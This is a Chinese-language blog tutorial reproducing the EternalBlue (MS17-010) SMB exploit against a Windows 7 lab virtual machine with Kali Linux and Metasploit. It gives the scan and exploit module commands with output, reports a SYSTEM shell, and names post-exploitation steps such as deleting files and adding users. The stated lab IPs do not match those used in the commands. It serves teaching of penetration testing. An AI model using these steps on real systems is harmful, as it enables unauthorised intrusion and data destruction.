web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片
web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

WannaCry勒索病毒席卷全球,一旦中了WannaCry病毒电脑文件会被“加密劫持”,黑客要求受害者支付高昂赎金(比特币)才能拿到解密秘钥。 而这枚WannaCry勒索病毒,就是黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,并进行大肆勒索传播。
MS17-010是Windows SMBv1服务中存在的远程代码执行漏洞;
? 开启SMB服务( 445端口) 的的系统可被执行远程代码, 从而导致被远程控制;
? 受影响系统: Windows XP、 Windows 7/8/10、 Server 2003/2008/2012/2016
只要用户打上MS17-010这个补丁,就可以避免这次攻击。

需准备环境:Kali-Linux、Windows 7 虚拟机
Kali-Linux :192.168.100.129
Windows 7: 192.168.100.131(确保处在同个网络下,能互相ping通)
web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

第一步:
①输入命令“msfconsole” ,进入metasploit渗透测试框架
②输入命令“search ms17-010”,搜索ms17-010相关漏洞利用代码
web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝渗透代码,前者先扫描,若显示有漏洞,再进行渗透。
第二步:
使用相对应的命令行,使用ms17-010扫描模块对靶机Win7进行扫描,才能进行下一步的渗透操作。
msf5 > use 1//使用ms17-010扫描模块,对靶机Win7进行扫描 msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.86.132//设置目标IP或网段 RHOST => 192.168.86.132 msf5 auxiliary(scanner/smb/smb_ms17_010) > run//执行扫描[+] 192.168.86.132:445- Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)//说明扫描到的这台win 7存在ms17-010漏洞 [*] 192.168.86.132:445- Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_ms17_010) > back

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

第三步:
使用ms17-010渗透模块对靶机Win7进行渗透
msf5 > use 2//使用ms17-010渗透模块对靶机Win7进行渗透 msf5 exploit(windows/smb/ms17_010_eternalblue) > show options//查看可设置的选项 msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.86.132 RHOST => 192.168.86.132//设置渗透目标IP msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit//执行渗透

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

看到“C:\Windows\system32>”就说明拿到了Win7的Shell,漏洞攻击已经成功,接下来要做的就是后渗透攻击,之后便可以通过Shell对目标靶机进行控制,后渗透测试中会有很多好玩的指令操作,如打开摄像头,删除文件,删除目标主机目录,创建系统用户等等。
后渗透测试一: 删除靶机的文件

后渗透测试二: 新建系统用户,远程控制靶机
web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)
文章图片

【web安全|网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)】

    推荐阅读